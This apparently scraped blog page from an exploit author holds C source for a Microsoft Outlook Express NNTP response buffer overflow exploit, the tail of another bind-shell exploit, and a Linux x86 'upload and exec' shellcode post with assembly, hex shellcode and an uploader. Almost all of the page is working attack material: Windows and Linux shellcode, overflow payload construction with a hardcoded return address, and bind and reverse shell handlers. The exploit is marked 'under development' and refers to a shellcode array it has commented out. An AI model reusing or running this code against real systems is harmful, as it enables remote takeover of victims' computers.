remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( bport );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ("--[ sleeping %d seconds before connecting to %s:%u...\n", sec, tip, bport );
wait ( sec );
printf ( "--[ connecting to %s:%u...", tip, bport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( RED "failed!\n" NORMAL);
exit ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
shell ( s, tip );
}
void
header ()
{
printf ( " __ __ _ \n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n" );
printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n" );
printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n" );
printf ( " /____/ \n\n" );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
}
void
parse_arguments ( int argc, char* argv[], args* argp )
{
int i = 0;
while ( ( i = getopt ( argc, argv, "h:p:t:" ) ) != -1 )
{
switch ( i )
{
case 'h':
argp->tip = optarg;
break;
case 'p':
argp->tport = atoi ( optarg );
break;
case 't':
argp->target = strtoul ( optarg, NULL, 16 );
break;
case ':':
case '?':
default:
usage ( argv[0] );
}
}
if ( argp->tip == NULL || argp->tport < 1 || argp->tport > 65535 || argp->target < 0 || argp->target > 5 )
usage ( argv[0] );
}
void
wait ( int sec )
{
sleep ( sec );
}
int
main ( int argc, char* argv[] )
{
int s;
args myargs;
system ( "clear" );
header ();
parse_arguments ( argc, argv, &myargs );
s = connect_to_remote_host ( myargs.tip, myargs.tport );
printf ( "--[ using bind shellcode\n" );
if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, target[myargs.target].sub ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
connect_to_bindshell ( myargs.tip, 20000 );
close ( s );
return 0;
}
| | 1:23 pm |
Microsoft Outlook Express NNTP Response Parsing Buffer Overflow
under development...
#include
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
#define PORT 119
int isip ( char *ip );
int shell ( int s, char* tip, unsigned short cbport );
void connect_to_bindshell ( char* tip, unsigned short bport );
void exploit ( int s, int option );
void header ();
void start_reverse_handler ( unsigned short cbport );
void wait ( int sec );
/*********************
* Windows Shellcode *
*********************/
/*
* win32_bind
* removed a lot of bad chars
*/
unsigned char scode[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0f"
"\xf8\xfd\x75\x83\xeb\xfc\xe2\xf4\xf3\x92\x16\x38\xe7\x01\x02\x8a"
"\xf0\x98\x76\x19\x2b\xdc\x76\x30\x33\x73\x81\x70\x77\xf9\x12\xfe"
"\x40\xe0\x76\x2a\x2f\xf9\x16\x3c\x84\xcc\x76\x74\xe1\xc9\x3d\xec"
"\xa3\x7c\x3d\x01\x08\x39\x37\x78\x0e\x3a\x16\x81\x34\xac\xd9\x5d"
"\x7a\x1d\x76\x2a\x2b\xf9\x16\x13\x84\xf4\xb6\xfe\x50\xe4\xfc\x9e"
"\x0c\xd4\x76\xfc\x63\xdc\xe1\x14\xcc\xc9\x26\x11\x84\xbb\xcd\xfe"
"\x4f\xf4\x76\x05\x13\x55\x76\x35\x07\xa6\x95\xfb\x41\xf6\x11\x25"
"\xf0\x2e\x9b\x26\x69\x90\xce\x47\x67\x8f\x8e\x47\x50\xac\x02\xa5"
"\x67\x33\x10\x89\x34\xa8\x02\xa3\x50\x71\x18\x13\x8e\x15\xf5\x77"
"\x5a\x92\xff\x8a\xdf\x90\x24\x7c\xfa\x55\xaa\x8a\xd9\xab\xae\x26"
"\x5c\xab\xbe\x26\x4c\xab\x02\xa5\x69\x90\xec\x29\x69\xab\x74\x94"
"\x9a\x90\x59\x6f\x7f\x3f\xaa\x8a\xd9\x92\xed\x24\x5a\x07\x2d\x1d"
"\xab\x55\xd3\x9c\x58\x07\x2b\x26\x5a\x07\x2d\x1d\xea\xb1\x7b\x3c"
"\x58\x07\x2b\x25\x5b\xac\xa8\x8a\xdf\x6b\x95\x92\x76\x3e\x84\x22"
"\xf0\x2e\xa8\x8a\xdf\x9e\x97\x11\x69\x90\x9e\x18\x86\x1d\x97\x25"
"\x56\xd1\x31\xfc\xe8\x92\xb9\xfc\xed\xc9\x3d\x86\xa5\x06\xbf\x58"
"\xf1\xba\xd1\xe6\x82\x82\xc5\xde\xa4\x53\x95\x07\xf1\x4b\xeb\x8a"
"\x7a\xbc\x02\xa3\x54\xaf\xaf\x24\x5e\xa9\x97\x74\x5e\xa9\xa8\x24"
"\xf0\x28\x95\xd8\xd6\xfd\x33\x26\xf0\x2e\x97\x8a\xf0\xcf\x02\xa5"
"\x84\xaf\x01\xf6\xcb\x9c\x02\xa3\x5d\x07\x2d\x1d\xff\x72\xf9\x2a"
"\x5c\x07\x2b\x8a\xdf\xf8\xfd\x75";
/*
unsigned char bindshell[] =
"\x31\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x92"
"\x35\x88\x95\x83\xeb\xfc\xe2\xf4\x6e\x5f\x63\xda\x7a\xcc\x77\x6a"
"\x6d\x55\x03\xf9\xb6\x11\x03\xd0\xae\xbe\xf4\x90\xea\x34\x67\x1e"
"\xdd\x2d\x03\xca\xb2\x34\x63\x76\xa2\x7c\x03\xa1\x19\x34\x66\xa4"
"\x52\xac\x24\x11\x52\x41\x8f\x54\x58\x38\x89\x57\x79\xc1\xb3\xc1"
"\xb6\x1d\xfd\x76\x19\x6a\xac\x94\x79\x53\x03\x99\xd9\xbe\xd7\x89"
"\x93\xde\x8b\xb9\x19\xbc\xe4\xb1\x8e\x54\x4b\xa4\x52\x51\x03\xd5"
"\xa2\xbe\xc8\x99\x19\x45\x94\x38\x19\x75\x80\xcb\xfa\xbb\xc6\x9b"
"\x7e\x65\x77\x43\xa3\xee\xee\xc6\xf4\x5d\xbb\xa7\xfa\x42\xfb\xa7"
"\xcd\x61\x77\x45\xfa\xfe\x65\x69\xa9\x65\x77\x43\xcd\xbc\x6d\xf3"
"\x13\xd8\x80\x97\xc7\x5f\x8a\x6a\x42\x5d\x51\x9c\x67\x98\xdf\x6a"
"\x44\x66\xdb\xc6\xc1\x66\xcb\xc6\xd1\x66\x77\x45\xf4\x5d\x99\xc9"
"\xf4\x66\x01\x74\x07\x5d\x2c\x8f\xe2\xf2\xdf\x6a\x44\x5f\x98\xc4"
"\xc7\xca\x58\xfd\x36\x98\xa6\x7c\xc5\xca\x5e\xc6\xc7\xca\x58\xfd"
"\x77\x7c\x0e\xdc\xc5\xca\x5e\xc5\xc6\x61\xdd\x6a\x42\xa6\xe0\x72"
"\xeb\xf3\xf1\xc2\x6d\xe3\xdd\x6a\x42\x53\xe2\xf1\xf4\x5d\xeb\xf8"
"\x1b\xd0\xe2\xc5\xcb\x1c\x44\x1c\x75\x5f\xcc\x1c\x70\x04\x48\x66"
"\x38\xcb\xca\xb8\x6c\x77\xa4\x06\x1f\x4f\xb0\x3e\x39\x9e\xe0\xe7"
"\x6c\x86\x9e\x6a\xe7\x71\x77\x43\xc9\x62\xda\xc4\xc3\x64\xe2\x94"
"\xc3\x64\xdd\xc4\x6d\xe5\xe0\x38\x4b\x30\x46\xc6\x6d\xe3\xe2\x6a"
"\x6d\x02\x77\x45\x19\x62\x74\x16\x56\x51\x77\x43\xc0\xca\x58\xfd"
"\x62\xbf\x8c\xca\xc1\xca\x5e\x6a\x42\x35\x88\x95";
unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";
*/
unsigned char shakehand1[] =
"\x32\x30\x30\x20\x52\x65\x61\x64\x79\x20\x2d\x20\x70\x6f\x73\x74"
"\x69\x6e\x67\x20\x61\x6c\x6c\x6f\x77\x65\x64\x2e\x0d\x0a";
unsigned char shakehand2[] =
"\x32\x31\x35\x20\x4c\x69\x73\x74\x20\x6f\x66\x20\x6e\x65\x77\x73"
"\x67\x72\x6f\x75\x70\x73\x20\x66\x6f\x6c\x6c\x6f\x77\x73\x2e\x0d"
"\x0a";
/*
unsigned char jumper[] =
"\xe9\x00\x00\xff\xff"; //jmp -xxxx
*/
int
isip ( char *ip )
{
int a, b, c, d;
if ( !sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d ) )
return ( 0 );
if ( a < 1 )
return ( 0 );
if ( a > 255 )
return 0;
if ( b < 0 )
return 0;
if ( b > 255 )
return 0;
if ( c < 0 )
return 0;
if ( c > 255 )
return 0;
if ( d < 0 )
return 0;
if ( d > 255 )
return 0;
return 1;
}
int
shell ( int s, char* tip, unsigned short cbport )
{
int n;
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
usleep(10);
}
}
void
connect_to_bindshell ( char* tip, unsigned short bport )
{
int s;
int sec = 5; // change this for fast targets
struct sockaddr_in remote_addr;
struct hostent *host_addr;
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
fprintf ( stderr, "cannot resolve \"%s\"\n", tip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( bport );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ( "--[ sleeping %d seconds before connecting to %s:%u...\n", sec, tip, bport );
wait ( sec );
printf ( "--[ connecting to %s:%u...", tip, bport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( RED "failed!\n" NORMAL);
exit ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
shell ( s, tip, bport );
}
void
exploit ( int s, int option )
{
char in[1024];
char out[32000];
char a[23600];
//msoeres.dll - 5.50.4807.1700 - Englisch (USA)
unsigned long callebx1 = 0x60209371;
printf ( "--[ shaking hands #1..." );
if ( send ( s, shakehand1, sizeof ( shakehand1 ) -1, 0 ) < 0 )
{
printf ( "failed\n" );
exit ( 1 );
}
printf ( "done\n" );
bzero ( &in, sizeof ( in ) );
printf ( "--[ reply: " );
if ( recv ( s, in, sizeof ( in ) -1, 0 ) < 0 )
{
printf ( "failed\n" );
exit ( 1 );
}
printf ( "%s", in );
printf ( "--[ shaking hands #2..." );
if ( send ( s, shakehand1, sizeof ( shakehand1 ) -1, 0 ) < 0 )
{
printf ( "failed\n" );
exit ( 1 );
}
printf ( "done\n" );
bzero ( &in, sizeof ( in ) );
printf ( "--[ reply: " );
if ( recv ( s, in, sizeof ( in ) -1, 0 ) < 0 )
{
printf ( "failed\n" );
exit ( 1 );
}
printf ( "%s", in );
printf ( "--[ shaking hands #3..." );
if ( send ( s, shakehand2, sizeof ( shakehand2 ) -1, 0 ) < 0 )
{
printf ( "failed\n" );
exit ( 1 );
}
printf ( "done\n" );
bzero ( &a, sizeof ( a ) );
memset ( a, 0x90, sizeof ( a ) );
memcpy ( a + 9623, "\xeb\x08", 2 );
memcpy ( a + 9627, ( unsigned char* ) &callebx1, 4 );
/*
if ( option == 0 )
memcpy ( a + 9647, reverseshell, sizeof ( reverseshell ) -1 );
else
memcpy ( a + 9647, bindshell, sizeof ( bindshell ) -1 );
*/
memcpy ( a + 9640, scode, sizeof ( scode ) -1 );
bzero ( &out, sizeof ( out ) );
snprintf ( out, sizeof ( out ) -1, "alt.12hr 0%s000001325 0000001322 y\r\n", a );
printf ( "--[ sending bad newsgroup..." );
if ( send ( s, out, strlen ( out ), 0 ) < 0 )
{
printf ( "failed\n" );
exit ( 1 );
}
printf ( "done\n" );
close ( s );
}
/*
void
header ()
{
printf ( " __ __ _ \n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n" );
printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n" );
printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n" );
printf ( " /____/ \n\n" );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
}
*/
void
start_reverse_handler ( unsigned short cbport )
{
int s1, s2;
struct sockaddr_in cliaddr, servaddr;
socklen_t clilen = sizeof ( cliaddr );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( cbport );
printf ( "--[ starting reverse handler [port: %u]...", cbport );
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( s1, 1 ) == -1 )
{
printf ( "listen failed!\n" );
exit ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
printf ( "accept failed!\n" );
exit ( 1 );
}
close ( s1 );
printf ( "--[ incomming connection from:\t" YELLOW " %s\n" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
close ( s2 );
}
void
wait ( int sec )
{
sleep ( sec );
}
int
main ( int argc, char* argv[] )
{
int s1, s2;
unsigned long lip;
unsigned long xoredip;
unsigned short cbport, xoredcbport;
char* ip;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
if ( argc != 1 )
if ( argc != 3 )
{
fprintf ( stderr, "Usage\n\nBindshell: %s\nReverseshell: %s \n", argv[0] );
exit ( 1 );
}
//system ( "clear" );
//header ();
if ( argc == 3 )
{
if ( !isip ( argv[1] ) )
{
printf ( "--[ Invalid connectback IP!\n" );
exit ( 1 );
}
}
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
exit ( 1 );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PORT );
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
printf ( "--[ Microsoft Outlook Express NNTP Response Parsing Buffer Overflow\n" );
printf ( "--[ listening..." );
if ( listen ( s1, 1 ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
clilen = sizeof ( cliaddr );
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
exit ( 1 );
close ( s1 );
printf ( "--[" GREEN " Incomming connection from:\t %s\n" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
if ( argc == 3 )
{
printf ( "--[" YELLOW " using connect back shellcode!\n" NORMAL );
xoredip = inet_addr ( argv[1] ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( atoi ( argv[2] ) ) ^ ( unsigned short ) 0x9999;
memcpy ( &reverseshell[111], &xoredip, 4);
memcpy ( &reverseshell[118], &xoredcbport, 2);
sscanf ( argv[2], "%u", &cbport );
exploit ( s2, 0 );
start_reverse_handler ( cbport );
}
else
{
printf ( "--[" YELLOW " using bind shellcode!\n" NORMAL );
ip = ( char* ) inet_ntoa ( cliaddr.sin_addr );
exploit ( s2, 1 );
connect_to_bindshell ( ip, 4444 );
}
}
| | Friday, June 17th, 2005 | | 10:11 pm |
UPLOAD & EXEC SHELLCODE
[1] converting asm to hex
[2] asm code
[3] hex output
[4] upload function
This is an 'upload and exec' shellcode for the x86 platform.
File has to be in executable format,
cool if you know the distribution of the target, otherwise
it is useless.
-cybertronic
[1]
/*
* convert .s to shellcode typo/teso (typo@inferno.tusculum.edu)
*
* $ cat asm.s
* .globl cbegin
* .globl cend
* cbegin:
* "asm goes here"
* cend:
* $ gcc -Wall asm.s asm2hex.c -o out
* $ ./out
*
*/
#include
extern void cbegin();
extern void cend();
int
main ()
{
int i = 0;
int x = 0;
char* buf = ( char* ) cbegin;
printf ( "unsigned char shellcode[] =\n\"" );
for ( ; ( *buf ) && ( buf < ( char* ) cend ); buf++ )
{
if ( i++ == 16 )
i = 1;
if ( i == 1 && x != 0 )
printf ( "\"\n\"" );
x = 1;
printf ( "\\x%02x", ( unsigned char )* buf );
}
printf ( "\";\n" );
return ( 0 );
}
[2]
# append to any bind shellcode
# gcc -Wall upload-exec.s asm2hex.c -o upload-exec
# cybertronic
.globl cbegin
.globl cend
cbegin:
movl %eax,%ecx
jmp getstr
start:
popl %esi
leal (%esi),%ebx
xorl %eax,%eax
movb %al,0x0b(%esi)
pushl %esi
pushl %ecx
movb $0x05,%al
movw $0x241,%cx
movw $00777,%dx
int $0x80
movl %eax,%edi
popl %esi
read:
movl %esi,%ebx
movb $0x03,%al
leal -200(%esp),%ecx
movb $0x01,%dl
int $0x80
cmpl $0xffffffff,%eax
je end
xorl %ecx,%ecx
cmpl %eax,%ecx
je continue
leal -200(%esp),%ecx
xorl %ebx,%ebx
movl %edi,%ebx
movl %eax,%edx
movb $0x04,%al
int $0x80
jmp read
continue:
movb $0x06,%al
movl %esi,%ebx
int $0x80
movb $0x06,%al
xorl %ebx,%ebx
movl %edi,%ebx
int $0x80
xorl %esi, %esi
popl %esi
movl %esi,0x0c(%esi)
xorl %eax,%eax
movl %eax,0x10(%esi)
movb $0x0b,%al
xchgl %esi,%ebx
leal 0x0c(%ebx),%ecx
leal 0x10(%ebx),%edx
int $0x80
end:
xorl %eax,%eax
incl %eax
int $0x80
getstr:
call start
.string "/usr/bin/ct"
cend:
[3]
/*
* linux x86
* 189 bytes upload & exec shellcode by cybertronic
* cybertronic[at]gmx[dot]net
*
*/
unsigned char shellcode[] =
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80"
"\x89\xc7\x52\x66\x68\xc7\xc7\x43\x66\x53\x89\xe1\xb0\xef\xf6\xd0"
"\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\x43\x43\xcd\x80\x50"
"\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xc1\xeb\x70\x5e\x8d\x1e"
"\x31\xc0\x88\x46\x0b\x56\x51\xb0\x05\x66\xb9\x41\x02\x66\xba\xff"
"\x01\xcd\x80\x89\xc7\x5e\x89\xf3\xb0\x03\x8d\x8c\x24\x38\xff\xff"
"\xff\xb2\x01\xcd\x80\x83\xf8\xff\x74\x3e\x31\xc9\x39\xc1\x74\x13"
"\x8d\x8c\x24\x38\xff\xff\xff\x31\xdb\x89\xfb\x89\xc2\xb0\x04\xcd"
"\x80\xeb\xd3\xb0\x06\x89\xf3\xcd\x80\xb0\x06\x31\xdb\x89\xfb\xcd"
"\x80\x31\xf6\x5e\x89\x76\x0c\x31\xc0\x89\x46\x10\xb0\x0b\x87\xf3"
"\x8d\x4b\x0c\x8d\x53\x10\xcd\x80\x31\xc0\x40\xcd\x80\xe8\x8b\xff"
"\xff\xff\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x63\x74";
[4]
int
upload ( char* ip )
{
int s;
int fd;
char ch;
struct stat st;
s = conn ( ip );
if ( ( fd = open ( "file", O_RDONLY ) ) == -1 )
return ( 1 );
fstat ( fd, &st );
while ( st.st_size-- > 0 )
{
if ( read ( fd, &ch, 1 ) < 0 )
return ( 1 );
if ( write ( s, &ch, 1 ) < 0 )
return ( 1 );
}
close ( fd );
close ( s );
return ( 0 );
}
|
|